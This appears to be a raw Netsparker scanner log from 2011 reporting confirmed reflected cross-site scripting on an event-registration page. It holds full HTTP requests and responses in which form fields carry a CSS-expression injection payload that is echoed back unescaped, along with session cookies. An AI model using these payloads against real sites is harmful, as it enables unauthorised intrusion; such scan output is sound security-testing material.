HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:26:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3409
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=f5940903547f451e85eb31abed66bc66
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=giel3cuqdlsjta1b75fm6uii83
Content-Length: 1820
Accept-Encoding: gzip, deflate

--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="action"

preload_category
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="eventid"

19301
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="categoryid"

-1
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="language"

eng
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="reference"

3
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="eb"

3
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="admin"

-1
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="bridgeid"

3
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="discountcode"

" stYle="x:expre/**/ssion(netsparker(9))
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="catpassword[65419]"

3
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="catpassword[65420]"

3
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="catpassword[65413]"

3
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="catpassword[65411]"

3
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="catpassword[65421]"

3
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="selectcategoryid"

65407
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="catpassword[65407]"

3
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="x"

0
--f5940903547f451e85eb31abed66bc66
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--f5940903547f451e85eb31abed66bc66--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:26:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3410
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=e2c1659370094803abc127de5aea23a4
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=nsftaradjidh62195faecsfo94
Content-Length: 1820
Accept-Encoding: gzip, deflate

--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="action"

preload_category
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="eventid"

19301
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="categoryid"

-1
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="language"

eng
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="reference"

3
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="eb"

3
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="admin"

-1
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="bridgeid"

3
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="discountcode"

3
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="catpassword[65419]"

" stYle="x:expre/**/ssion(netsparker(9))
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="catpassword[65420]"

3
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="catpassword[65413]"

3
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="catpassword[65411]"

3
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="catpassword[65421]"

3
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="selectcategoryid"

65407
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="catpassword[65407]"

3
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="x"

0
--e2c1659370094803abc127de5aea23a4
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--e2c1659370094803abc127de5aea23a4--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:27:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3413
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { 